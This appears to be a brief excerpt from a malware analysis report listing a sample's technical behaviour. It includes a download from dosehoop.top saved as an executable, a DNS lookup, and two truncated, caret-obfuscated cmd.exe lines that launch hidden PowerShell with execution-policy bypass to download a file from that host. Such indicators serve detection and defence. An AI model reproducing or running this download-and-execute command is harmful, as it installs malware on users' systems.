Technical Information
- http://dosehoop.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoW^Er^she^lL.E^x^E -eXeC^u^t^Io^npoLiC^Y BYp^a^S^s -no^PRO^F^iLE -wiNDOwSTyle HiD^dEn ^(^N^EW-oB^jecT^ sy^sTEm.^n^Et^.^wEBcli^e^Nt^).d^O^Wn^L^O^a^DfilE('http://dosehoop.top...
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /C "PoW^Er^she^lL.E^x^E -eXeC^u^t^Io^npoLiC^Y BYp^a^S^s -no^PRO^F^iLE -wiNDOwSTyle HiD^dEn ^(^N^EW-oB^jecT^ sy^sTEm.^n^Et^.^wEBcli^e^Nt^).d^O^Wn^L^O^a^DfilE('http://dosehoop.top...' (with hidden window)